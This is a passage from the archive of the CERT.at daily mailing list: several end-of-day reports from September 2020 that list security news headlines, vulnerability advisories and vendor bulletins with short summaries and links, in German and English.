efforts on. --------------------------------------------- https://www.zdnet.com/article/defense-evasion-code-execution-are-the-top-at… ∗∗∗ Rückblick auf das zweite Drittel 2020 ∗∗∗ --------------------------------------------- Anders als das erste Jahresdrittel, begann das zweite wesentlich weniger dramatisch, was IT-Sicherheit angeht. Neben Citrix, dem auch im 2. Jahresdrittel unsere erste anlassbezogene Aussendung zu verdanken war, kam auch eine andere alte Schwachstelle zu neuem "Ruhm". --------------------------------------------- https://cert.at/de/blog/2020/9/ruckblick-auf-das-zweite-drittel-2020 ===================== = Vulnerabilities = ===================== ∗∗∗ Sicherheitslücke: Mobiler Firefox-Browser führte Befehle aus dem WLAN aus ∗∗∗ --------------------------------------------- Im gleichen WLAN konnten Angreifer den mobilen Firefox-Browser unter Android beliebige Webseiten oder andere Apps öffnen lassen - ohne Nutzerinteraktion. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-mobiler-firefox-browser-fuehrte… ∗∗∗ Micropatch for Zerologon, the "perfect" Windows vulnerability (CVE-2020-1472) ∗∗∗ --------------------------------------------- The Zerologon vulnerability allows an attacker with network access to a Windows Domain Controller to quickly and reliably take complete control of the Windows domain. As such, it is a perfect vulnerability for any attacker and a nightmare for defenders. --------------------------------------------- https://blog.0patch.com/2020/09/micropatch-for-zerologon-perfect.html ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (inspircd and modsecurity), Fedora (chromium, cryptsetup, gnutls, mingw-libxml2, and seamonkey), openSUSE (ark, chromium, claws-mail, docker-distribution, fossil, hylafax+, inn, knot, libetpan, libjpeg-turbo, libqt4, librepo, libvirt, libxml2, lilypond, mumble, openldap2, otrs, pdns-recursor, perl-DBI, python-Flask-Cors, singularity, slurm_18_08, and virtualbox), SUSE (jasper, less, ovmf, and rubygem-actionview-4_2), and Ubuntu (sa-exim). --------------------------------------------- https://lwn.net/Articles/832080/ ∗∗∗ MISP 2.4.132 released (security fix CVE-2020-25766 and bugs fixed) ∗∗∗ --------------------------------------------- A new version of MISP (2.4.132) has been released with several bugs fixed including an important security fix CVE-2020-25766. --------------------------------------------- https://www.misp-project.org/2020/09/21/MISP.2.4.132.released.html ∗∗∗ B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php ∗∗∗ B-swiss 3 Digital Signage System 3.6.5 CSRF Add Maintenance Admin ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5589.php ∗∗∗ B-swiss 3 Digital Signage System 3.6.5 Database Disclosure ∗∗∗ --------------------------------------------- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5588.php ∗∗∗ Security Bulletin: Denial of Service with HTTP/2 in IBM DataPower Gateway (CVE-2020-4579) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-with-ht… ∗∗∗ Security Bulletin: IBM Business Automation Content Analyzer is affected by Insecure Cookie vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-business-automation-c… ∗∗∗ Security Bulletin: Denial of Service with HTTP/2 in IBM DataPower Gateway (CVE-2020-4581) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-with-ht… ∗∗∗ Security Bulletin: Denial of Service in IBM DataPower Gateway (CVE-2020-4580) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-in-ibm-… ∗∗∗ Security Bulletin: Vulnerability in bind (CVE-2020-8616 and CVE-2020-8617). ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-bind-cve… ∗∗∗ Security Bulletin: Vulnerability in ntp (CVE-2020-11868 and CVE-2020-13817). ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-ntp-cve-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.09.2020
by Daily end-of-shift report 18 Sep '20

18 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 17-09-2020 18:00 − Freitag 18-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Maze ransomware now encrypts via virtual machines to evade detection ∗∗∗ --------------------------------------------- The Maze ransomware operators have adopted a tactic previously used by the Ragnar Locker gang; to encrypt a computer from within a virtual machine. --------------------------------------------- https://www.bleepingcomputer.com/news/security/maze-ransomware-now-encrypts… ∗∗∗ Microsoft removes Windows Defender ability after security concerns ∗∗∗ --------------------------------------------- Microsoft has removed the ability to download files using Windows Defender after it was demonstrated how it could be used by attackers to download malware onto a computer. --------------------------------------------- https://www.bleepingcomputer.com/news/microsoft/microsoft-removes-windows-d… ∗∗∗ Mozi Botnet Accounts for Majority of IoT Traffic ∗∗∗ --------------------------------------------- Mozi’s spike comes amid a huge increase in overall IoT botnet activity. --------------------------------------------- https://threatpost.com/mozi-botnet-majority-iot-traffic/159337/ ∗∗∗ Ransomware-Angriffe als Folge von Shitrix ∗∗∗ --------------------------------------------- Monate nach dem Auftauchen der kritischen Sicherheitslücke im Citrix Application Delivery Controller (ADC) und NetScaler Gateway (CVE-2019-19781, auch als “Shitrix“ bekannt) werden nun immer mehr Fälle bekannt, in denen die Lücke sehr früh ausgenutzt, jedoch erst sehr viel später lukrativ verwendet wurde bzw. aktuell wird. --------------------------------------------- https://www.hisolutions.com/detail/ransomware-angriffe-als-folge-von-shitrix ∗∗∗ Identitätsdiebstahl: Das sind die gängigsten Betrugsmaschen ∗∗∗ --------------------------------------------- Ausweiskopien und fremde Identitäten sind im Bereich der Internetkriminalität ein begehrtes Gut. Denn so können Kriminelle unter falschem Namen Straftaten begehen und bleiben selbst unentdeckt. --------------------------------------------- https://www.watchlist-internet.at/news/identitaetsdiebstahl-das-sind-die-ga… ===================== = Vulnerabilities = ===================== ∗∗∗ Backdoors in Video-Encodern auf Huawei-Chips entdeckt - Ursprung unbekannt ∗∗∗ --------------------------------------------- Ein Sicherheitsforscher ist auf mehrere kritische Sicherheitslücken gestoßen, die Hardware-Video-Encoder angreifbar machen. --------------------------------------------- https://heise.de/-4905641 ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by Arch Linux (chromium and netbeans), Oracle (mysql:8.0 and thunderbird), SUSE (rubygem-rack and samba), and Ubuntu (apng2gif, gnupg2, libemail-address-list-perl, libproxy, pulseaudio, pure-ftpd, samba, and xawtv). --------------------------------------------- https://lwn.net/Articles/831853/ ∗∗∗ Cisco Content Security Management Appliance and Cisco Email Security Appliance Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Security Bulletin: IBM OpenPages with Watson has addressed a Cross-Site Scripting (XSS) vulnerability (CVE-2020-4443) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-openpages-with-watson… ∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affect Financial Transaction Manager for Digital Payments (CVE-2020-2654) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: WebSphere Application Server is vulnerable to an information exposure vulnerability (CVE-2020-4643) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-websphere-application-ser… ∗∗∗ Security Bulletin: IBM OpenPages with Watson has addressed a reverse tabnabbing vulnerability (CVE-2020-4440) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-openpages-with-watson… ∗∗∗ Pivotal spring-boot: Schwachstelle ermöglicht Umgehung von Sicherheitsvorkehrungen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0911 ∗∗∗ Atlassian Jira Software: Schwachstelle ermöglicht Offenlegung von Informationen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0910 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 17.09.2020
by Daily end-of-shift report 17 Sep '20

17 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Mittwoch 16-09-2020 18:00 − Donnerstag 17-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Cyber-Angriff auf Uniklinik Düsseldorf: BSI warnt vor akuter Ausnutzung bekannter Schwachstelle ∗∗∗ --------------------------------------------- Am 10. September 2020 kam es zu einem IT-Sicherheitsvorfall im Universitätsklinikum Düsseldorf (UKD). Gemäß BSI-Gesetz hat das UKD das Bundesamt für Sicherheit in der Informationstechnik (BSI) über diesen Vorfall informiert. [...] In diesem Zusammenhang weist das BSI mit Nachdruck darauf hin, dass derzeit eine seit Januar 2020 bekannte Schwachstelle (CVE-2019-19781) in VPN-Produkten der Firma Citrix für Cyber-Angriffe ausgenutzt wird. Dem BSI werden zunehmend Vorfälle bekannt, bei denen Citrix-Systeme bereits vor der Installation der im Januar 2020 bereitgestellten Sicherheitsupdates kompromittiert wurden. Dadurch haben Angreifer auch nach Schließung der Sicherheitslücke weiterhin Zugriff auf das System und dahinterliegende Netzwerke. Diese Möglichkeit wird aktuell vermehrt ausgenutzt, um Angriffe auf betroffene Organisationen durchzuführen. --------------------------------------------- https://www.bsi.bund.de/DE/Presse/Pressemitteilungen/Presse2020/UKDuesseldo… ∗∗∗ Evasive URLs in Spam ∗∗∗ --------------------------------------------- Cybercriminals are continuously evolving their tools, tactics, and techniques to evade spam detection systems. We recently observed some spam campaigns that heavily relied on URL obfuscation in email messages. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-url… ∗∗∗ phpbash – A Terminal Emulator Web Shell ∗∗∗ --------------------------------------------- It’s common for hackers to utilize post-compromise tools that contain a graphical user interface (GUI) that can be loaded in the web browser. A GUI generally makes the tool easier to use — and certainly more visually appealing than just raw text. One example of web malware that uses GUIs are PHP webshells like r57. --------------------------------------------- https://blog.sucuri.net/2020/09/phpbash-terminal-editor-web-shell.html ∗∗∗ GuLoaders VM-Exit Instruction Hammering explained ∗∗∗ --------------------------------------------- In Joe Sandbox Cloud Basic, our community version of Joe Sandbox, we often get very interesting and recent malware samples. On the September 16th, 2020 we came across a new GuLoader variant (MD5: 01a54f73856cfb74a3bbba47bcec227b). GuLoader is a malware loader well known for its anti-evasion techniques. --------------------------------------------- http://blog.joesecurity.org/2020/09/guloaders-vm-exit-instruction-hammering… ===================== = Vulnerabilities = ===================== ∗∗∗ Schadcode per Word-Datei: Microsoft flickt Office für Mac ∗∗∗ --------------------------------------------- Microsoft hat die macOS-Version seiner Office-Suite aktualisiert. Die Updates schließen Schwachstellen, die das Ausführen von Schadcode ermöglichen. --------------------------------------------- https://heise.de/-4904475 ∗∗∗ Apple iOS & iPadOS: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Apple iOS und Apple iPadOS ausnutzen, um beliebigen Programmcode auszuführen, einen Denial of Service Zustand herbeizuführen, Informationen offenzulegen, einen Cross-Site Scripting Angriff durchzuführen, Sicherheitsvorkehrungen zu umgehen oder sonstige Auswirkungen zu verursachen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0907 ∗∗∗ Drupal: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Drupal ausnutzen, um einen Cross-Site Scripting Angriff durchzuführen, Sicherheitsvorkehrungen zu umgehen und Informationen offenzulegen. --------------------------------------------- https://www.cert-bund.de/advisoryshort/CB-K20-0906 ∗∗∗ Vulnerability Spotlight: Remote code execution vulnerability Apple Safari ∗∗∗ --------------------------------------------- The Apple Safari web browser contains a remote code execution vulnerability in its Webkit feature. Specifically, an attacker could trigger a use-after-free condition in WebCore, the DOM-rendering system for Webkit used in Safari. This could give the attacker the ability to execute remote code on the victim machine. --------------------------------------------- https://blog.talosintelligence.com/2020/09/vuln-spotlight-apple-safari-sept… ∗∗∗ High-Severity Vulnerabilities Patched in Discount Rules for WooCommerce ∗∗∗ --------------------------------------------- On August 20, 2020, the Wordfence Threat Intelligence team was made aware of several vulnerabilities that had been patched in Discount Rules for WooCommerce, a WordPress plugin installed on over 40,000 sites. --------------------------------------------- https://www.wordfence.com/blog/2020/09/high-severity-vulnerabilities-patche… ∗∗∗ Security updates for Thursday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (dotnet3.1, kernel, mbedtls, and python35), Mageia (libraw), openSUSE (mumble), SUSE (libsolv, libzypp, and perl-DBI), and Ubuntu (libdbi-perl, libphp-phpmailer, mcabber, ncmpc, openssl, openssl1.0, qemu, samba, storebackup, and util-linux). --------------------------------------------- https://lwn.net/Articles/831720/ ∗∗∗ Synology-SA-20:21 Zerologon ∗∗∗ --------------------------------------------- A vulnerability allows remote attackers to bypass security constraints via a susceptible version of Synology Directory Server. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_21 ∗∗∗ Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance Security Update ∗∗∗ --------------------------------------------- Multiple vulnerabilities have been discovered in Citrix ADC (formerly known as NetScaler ADC), Citrix Gateway (formerly known as NetScaler Gateway) and Citrix SD-WAN WANOP appliance models 4000-WO, 4100-WO, 5000-WO, and 5100-WO. --------------------------------------------- https://support.citrix.com/article/CTX281474 ∗∗∗ Security Bulletin: Vulnerabilities in WebSphere Application Server affect IBM Cloud Orchestrator and IBM Cloud Orchestrator Enterprise ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-websph… ∗∗∗ Security Bulletin: IBM Aspera Shares 1.9.14 Patch Level 1 and earlier are vulnerable to DOM XSS ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-aspera-shares-1-9-14-… ∗∗∗ Security Bulletin: Denial of service vulnerability in WebSphere Application Server Liberty (CVE-2020-4590) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-denial-of-service-vulnera… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 16.09.2020
by Daily end-of-shift report 16 Sep '20

16 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Dienstag 15-09-2020 18:00 − Mittwoch 16-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Malware greift Microsoft Datenbanken an ∗∗∗ --------------------------------------------- Eine neue Malware-Gang hat sich in den letzten Monaten einen Namen gemacht, indem sie sich in die Datenbank Microsoft SQL Server (MSSQL) gehackt und einen Crypto-Miner installiert hat. --------------------------------------------- https://www.zdnet.de/88382758/malware-greift-microsoft-datenbanken-an/ ∗∗∗ Netflix-KundInnen aufgepasst: Betrügerische E-Mails im Umlauf! ∗∗∗ --------------------------------------------- Derzeit häufen sich Meldungen über betrügerische E-Mails, die angeblich von Netflix stammen. In diesen E-Mails werden die Opfer darum gebeten, ihre Zahlungsinformationen zu aktualisieren, da es Probleme mit der Rechnung gäbe. Die Mails stammen jedoch nicht von Netflix, sondern von Kriminellen, die versuchen an die Kreditkartendaten der EmpfängerInnen zu kommen. --------------------------------------------- https://www.watchlist-internet.at/news/netflix-kundinnen-aufgepasst-betrueg… ∗∗∗ This security awareness training email is actually a phishing scam ∗∗∗ --------------------------------------------- A creative phishing campaign uses an email template that pretends to be a reminder to complete security awareness training from a well-known security company. --------------------------------------------- https://www.bleepingcomputer.com/news/security/this-security-awareness-trai… ∗∗∗ DNS security best practices: Preventing DNS hijacking, poisoning and redirection ∗∗∗ --------------------------------------------- The importance of DNS The Domain Name System (DNS) is one of the fundamental protocols of the Internet. It provides a lookup service that converts domain names (like google.com) into IP addresses (like 192.168.0.0). While DNS has always been an important protocol, the growing use of cloud-based services has made it even more so. --------------------------------------------- https://resources.infosecinstitute.com/dns-security-best-practices-preventi… ∗∗∗ Do Vulnerabilities Ever Get Old? Recent "Mirai" Variant Scanning for 20 Year Old Amanda Version?, (Wed, Sep 16th) ∗∗∗ --------------------------------------------- We always say how network security is changing every day. Take a long lunch, and you may miss a critical exploit. But sometimes, time appears to stand still. We just passed 1.6 Billion seconds in the Unix Epoch. Back when the Unix timestamp still had 9 digits, in the late 90s also known as "pre Y2K", one of the servers you may have used for backups was Amanda (Advanced Maryland Automatic Network Disk Archiver). Still active and alive today, back then Amanda V 2.3 was current. --------------------------------------------- https://isc.sans.edu/diary/rss/26572 ∗∗∗ The Hacker Motive: What Attackers Are Doing with Your Hacked Site ∗∗∗ --------------------------------------------- Yesterday, September 15, 2020, the Wordfence Live team covered The Hacker Motive: What Attackers Are Doing with Your Hacked Site. This companion blog post reviews the motives we discussed live during Wordfence Live and dives deeper into the minds of attackers. --------------------------------------------- https://www.wordfence.com/blog/2020/09/the-hacker-motive-what-attackers-are… ∗∗∗ Billions of devices vulnerable to new BLESA Bluetooth security flaw ∗∗∗ --------------------------------------------- New BLESA attack goes after the often ignored Bluetooth reconnection process, unlike previous vulnerabilities, most found in the pairing operation. --------------------------------------------- https://www.zdnet.com/article/billions-of-devices-vulnerable-to-new-blesa-b… ===================== = Vulnerabilities = ===================== ∗∗∗ Cisco Content Security Management Appliance and Cisco Web Security Appliance Information Disclosure Vulnerability ∗∗∗ --------------------------------------------- A vulnerability in the web-based management interface of Cisco AsyncOS software for Cisco Content Security Management Appliance (SMA) and Cisco Web Security Appliance (WSA) could allow an authenticated, remote attacker to access sensitive information on an affected device. --------------------------------------------- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco… ∗∗∗ Schadcode-Lücken in Nitro Pro PDF geschlossen ∗∗∗ --------------------------------------------- Es sind wichtige Sicherheitsupdates für die PDF-Anwendung Nitro Pro erschienen. --------------------------------------------- https://heise.de/-4902752 ∗∗∗ IBM: Sicherheitsupdates für zahlreiche Produkte verfügbar ∗∗∗ --------------------------------------------- Seit Anfang voriger Woche hat IBM eine ganze Reihe von Lücken aus seinem Produktportfolio beseitigt – darunter einige mit hohem bis kritischem Schweregrad. --------------------------------------------- https://heise.de/-4902825 ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Fedora (libssh, python35, and xen), Oracle (kernel), Red Hat (librepo and mysql:8.0), SUSE (perl-DBI), and Ubuntu (Apache Log4j, Apache XML-RPC, bsdiff, libdbi-perl, luajit, milkytracker, OpenJPEG, ruby-loofah, and ruby-websocket-extensions). --------------------------------------------- https://lwn.net/Articles/831654/ ∗∗∗ Flaws in Philips Patient Monitoring Products Can Lead to Patient Data Exposure ∗∗∗ --------------------------------------------- Multiple vulnerabilities identified in Philips patient monitoring solutions could provide attackers with unauthorized access to patient data. read more --------------------------------------------- https://www.securityweek.com/flaws-philips-patient-monitoring-products-can-… ∗∗∗ Security Advisory - Use-after-free Vulnerability in Some Huawei Smart Phone ∗∗∗ --------------------------------------------- http://www.huawei.com/en/psirt/security-advisories/2020/huawei-sa-20200916-… ∗∗∗ Trend Micro ServerProtect for Linux: Schwachstelle ermöglicht Ausführen von beliebigem Programmcode mit Administratorrechten ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0905 ∗∗∗ Node.js: Mehrere Schwachstellen ∗∗∗ --------------------------------------------- http://www.cert-bund.de/advisoryshort/CB-K20-0904 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 15.09.2020
by Daily end-of-shift report 15 Sep '20

15 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Montag 14-09-2020 18:00 − Dienstag 15-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Windows 10 'Finger' command can be abused to download or steal files ∗∗∗ --------------------------------------------- The list of native executables in Windows that can download or run malicious code keeps growing as another one has been reported recently. --------------------------------------------- https://www.bleepingcomputer.com/news/security/windows-10-finger-command-ca… ∗∗∗ Sicherheitslücke: Mit acht Nullen zum Active-Directory-Admin ∗∗∗ --------------------------------------------- Die Sicherheitslücke Zerologon nutzt einen Fehler in Netlogon aus und involviert die Zahl Null auf kreative Weise - um Passwörter zu ändern. --------------------------------------------- https://www.golem.de/news/sicherheitsluecke-mit-acht-nullen-zum-active-dire… ∗∗∗ Erfolgreiche Angriffskampagne trifft Online-Shops auf Basis von Magento 1 ∗∗∗ --------------------------------------------- Der Support für Version 1.x der Onlineshop-Software Magento endete im Juni 2020. Eine aktuelle "Magecart"-Angriffskampagne zielt nun auf veraltete Shops. --------------------------------------------- https://heise.de/-4894269 ∗∗∗ Shitrix-Nachwehen: Citrix-Systeme mit unbemerkten Backdoors ∗∗∗ --------------------------------------------- Auf Citrix ADC und Netscaler Gateways sind offenbar über die Shitrix-Lücke Anfang des Jahres Backdoors installiert worden, durch die Ransomware gelangen kann. --------------------------------------------- https://heise.de/-4901590 ∗∗∗ Erpressungs-E-Mails: Kriminelle hätten Beweise, dass Sie fremdgehen ∗∗∗ --------------------------------------------- Werden Sie per E-Mail erpresst? Behauptet der Erpresser, einen Virus auf Ihrem Smartphone installiert zu haben, der Ihre Aktivitäten überwacht? Hat er angeblich Beweismaterial, dass Sie beim Fremdgehen zeigt? Fordert man für Stillschweigen die Überweisung von Bitcoins? Dann: Machen Sie sich keine Sorgen! Es handelt sich um ein betrügerisches E-Mail, das aktuell massenhaft versendet wird! --------------------------------------------- https://www.watchlist-internet.at/news/erpressungs-e-mails-kriminelle-haett… ∗∗∗ Network Attack Trends: Attackers Leveraging High Severity and Critical Exploits ∗∗∗ --------------------------------------------- We captured global network traffic from firewalls around the world and then analyzed the data to examine the latest network attack trends. --------------------------------------------- https://unit42.paloaltonetworks.com/network-attack-trends/ ∗∗∗ MITRE releases emulation plan for FIN6 hacking group, more to follow ∗∗∗ --------------------------------------------- New MITRE project to provide free emulation plans that mimic major threat actors in order to train and help defenders. --------------------------------------------- https://www.zdnet.com/article/mitre-releases-emulation-plan-for-fin6-hackin… ∗∗∗ Hackers are getting more hands-on with their attacks. Thats not a good sign ∗∗∗ --------------------------------------------- Both nation-state backed hackers and cyber criminals asking trying to take advantage of the rise in remote working, and getting more sophisticated in their approach. --------------------------------------------- https://www.zdnet.com/article/hackers-are-getting-more-hands-on-with-their-… ===================== = Vulnerabilities = ===================== ∗∗∗ MFA Bypass Bugs Opened Microsoft 365 to Attack ∗∗∗ --------------------------------------------- Vulnerabilities 'that have existed for years' in WS-Trust could be exploited to attack other services such as Azure and Visual Studio. --------------------------------------------- https://threatpost.com/flaws-in-microsoft-365s-mfa-access-cloud-apps/159240/ ∗∗∗ VMware VMSA-2020-0020 (Sep 14) ∗∗∗ --------------------------------------------- VMware Workstation, Fusion and Horizon Client updates address multiple security vulnerabilities (CVE-2020-3980, CVE-2020-3986, CVE-2020-3987, CVE-2020-3988, CVE-2020-3989, CVE-2020-3990) --------------------------------------------- https://www.vmware.com/security/advisories/VMSA-2020-0020.html ∗∗∗ Notfallpatch für Adobe Media Encoder verfügbar ∗∗∗ --------------------------------------------- Angreifer könnten Media Encoder von Adobe attackieren und Informationen leaken. --------------------------------------------- https://heise.de/-4901833 ∗∗∗ Vulnerability Spotlight: Memory corruption in Google PDFium ∗∗∗ --------------------------------------------- Google Chromes PDFium feature could be exploited by an adversary to corrupt memory and potentially execute remote code. Chrome is a popular, free web browser available on all operating systems. PDFium allows users to open PDFs inside Chrome. We recently discovered a bug that would allow an adversary to send a malicious web page to a user, and then cause out-of-bounds memory access. --------------------------------------------- https://blog.talosintelligence.com/2020/09/vuln-spotlight-google-pdfium-sep… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by CentOS (dovecot), Debian (gnome-shell and teeworlds), Mageia (libetpan and zeromq), openSUSE (libxml2), Red Hat (chromium-browser and librepo), SUSE (compat-openssl098, firefox, kernel, openssl, and shim), and Ubuntu (gupnp). --------------------------------------------- https://lwn.net/Articles/831592/ ∗∗∗ Synology-SA-20:20 Photo Station ∗∗∗ --------------------------------------------- Multiple vulnerabilities allow remote attackers to execute arbitrary code via a susceptible version of Photo Station. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_20_20 ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Java Deserialization (CVE-2020-4521) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: IBM Security Guardium is affected by a Missing Security Control vulnerability ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to SQL Injection (CVE-2019-4671) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: Docker vulnerability affects IBM Spectrum Protect Plus (CVE-2020-13401) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-docker-vulnerability-affe… ∗∗∗ Security Bulletin: Linux Kernel vulnerability affects IBM Spectrum Protect Plus (187206) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-linux-kernel-vulnerabilit… ∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to cross-site request forgery (CVE-2020-4526) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme… ∗∗∗ Security Bulletin: Directory Traversal and Execution of Arbitrary Code vulnerabilities in IBM Spectrum Protect Plus (CVE-2020-4711, CVE-2020-4703) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-directory-traversal-and-e… ∗∗∗ Security Bulletin: Cacheable HTTPS Response vulnerability in IBM Tivoli Business Service Manager (CVE-2020-4344) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-cacheable-https-response-… ∗∗∗ Security Bulletin: A vulnerability in IBM Java SDK affects IBM Tivoli Business Service Manager (CVE-2020-14577) ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja… ∗∗∗ Security Bulletin: Improper DLL loading vulnerability affecting Aspera Connect 3.9.9 and earlier ∗∗∗ --------------------------------------------- https://www.ibm.com/blogs/psirt/security-bulletin-improper-dll-loading-vuln… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 14.09.2020
by Daily end-of-shift report 14 Sep '20

14 Sep '20

===================== = End-of-Day report = ===================== Timeframe: Freitag 11-09-2020 18:00 − Montag 14-09-2020 18:00 Handler: Thomas Pribitzer Co-Handler: Stephan Richter ===================== = News = ===================== ∗∗∗ Zerologon übernimmt Domain-Controller ∗∗∗ --------------------------------------------- Unbemerkt von vielen hat Microsoft im August letzten Monats einen der schwerwiegendsten Fehler behoben, der dem Unternehmen jemals gemeldet wurde. Dieses Problem könnte dazu missbraucht werden, Windows-Server, die als Domänencontroller in Unternehmensnetzwerken laufen, einfach zu übernehmen. --------------------------------------------- https://www.zdnet.de/88382688/zerologon-uebernimmt-domain-controller/ ∗∗∗ Magento stores hit by largest automated hacking attack since 2015 ∗∗∗ --------------------------------------------- In the largest automated hacking campaign against Magento sites, attackers compromised almost 2,000 online stores this weekend to steal credit cards. --------------------------------------------- https://www.bleepingcomputer.com/news/security/magento-stores-hit-by-larges… ∗∗∗ Creating patched binaries for pentesting purposes, (Sun, Sep 13th) ∗∗∗ --------------------------------------------- When doing pentestings, the establishment of backdoors is vital to be able to carry out lateral movements in the network or to reach the stage of action on objectives. This is usually accomplished by inviting someone to click on a commonly used executable on the computer using social engineering techniques. --------------------------------------------- https://isc.sans.edu/diary/rss/26560 ∗∗∗ ModSecurity, Regular Expressions and Disputed CVE-2020-15598 ∗∗∗ --------------------------------------------- This blog post will discuss that tradeoff in the context of regular expressions in ModSecurity. It will cover an issue raised by a member of the community as a security issue (assigned CVE-2020-15598), which we disputed, and some tips for how to avoid the more problematic aspects of regular expressions in ModSecurity. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/modsecurity… ∗∗∗ New BlindSide attack uses speculative execution to bypass ASLR ∗∗∗ --------------------------------------------- New BlindSide technique abuses the CPUs internal performance-boosting feature to bypass OS security protection. --------------------------------------------- https://www.zdnet.com/article/new-blindside-attack-uses-speculative-executi… ===================== = Vulnerabilities = ===================== ∗∗∗ Hyland OnBase Arbitrary File Upload ∗∗∗ --------------------------------------------- Hyland OnBase allows malicious attackers to directly upload arbitrary files to the OnBase server using file upload methods. The client-side sometimes restricts file types, but the server-side does not allowing attackers with direct server access to upload files of any type including malicious files designed to compromise clients that view the data. OnBase also appears to lack the proper mechanisms to verify that files are of the type claimed and instead relies on file extensions, allowing attackers to upload malicious files whose extensions do not match the actual file type. This allows a second vector for malicious file upload and attacking clients. --------------------------------------------- https://cxsecurity.com/issue/WLB-2020090071 ∗∗∗ WordPress Plugin Flaw Allows Attackers to Forge Emails ∗∗∗ --------------------------------------------- The high-severity flaw in the Email Subscribers & Newsletters plugin by Icegram affects more than 100,000 WordPress websites. --------------------------------------------- https://threatpost.com/wordpress-plugin-flaw/159172/ ∗∗∗ Sicherheitsupdates: Root-Lücke bedroht Firewalls von Palo Alto 